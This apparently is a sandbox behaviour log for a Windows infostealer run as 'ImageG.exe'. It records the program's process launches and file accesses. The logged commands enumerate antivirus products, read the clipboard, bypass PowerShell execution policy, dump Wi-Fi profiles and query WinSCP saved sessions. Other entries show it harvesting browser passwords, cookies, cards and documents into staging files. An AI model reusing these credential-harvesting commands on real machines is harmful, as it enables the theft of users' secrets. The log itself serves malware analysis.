        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /PID 9048 /F
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "c:\users\user\appdata\local\temp\2umc3lagtb9vwbjfvr15mhcztwv\imageg.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\desenamoreis" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "c:\users\user\appdata\local\temp\2umc3lagtb9vwbjfvr15mhcztwv\imageg.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-us --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\desenamoreis" --mojo-platform-channel-handle=2424 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "get-ciminstance -namespace root/securitycenter2 -classname antivirusproduct | format-list displayname, instanceguid, pathtosignedproductexe, pathtosignedreportingexe, productstate, timestamp""
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\Desktop\ImageG.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001 VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\CURRENT VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOCK VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1 VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmp VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Edge [Default] - Cookies.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Passwords.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\logBighead.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\System Info.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\computer - 2025-03-15_152648.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\AutoFill.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Bookmarks.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Cards.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Edge [Default] - Cookies.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\History.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Passwords.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\System Info.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Program Files\Windows NT\TableTextService VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\.curlrc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\NTUSER.DAT{453f72bd-0c4f-11ec-a4f9-d05099db2397}.TM.blf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\SciTE.session VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.mp3 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\WKXEWIOTXI\LSBIHQFDVT.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\WKXEWIOTXI\QNCYCDFIJJ.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\SQRKHNBNYN.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Documents\WKXEWIOTXI.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\IPKGELNTQY.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\SQRKHNBNYN.pdf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\AutoFill.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\AutoFill.txt VolumeInformationJump to behavior
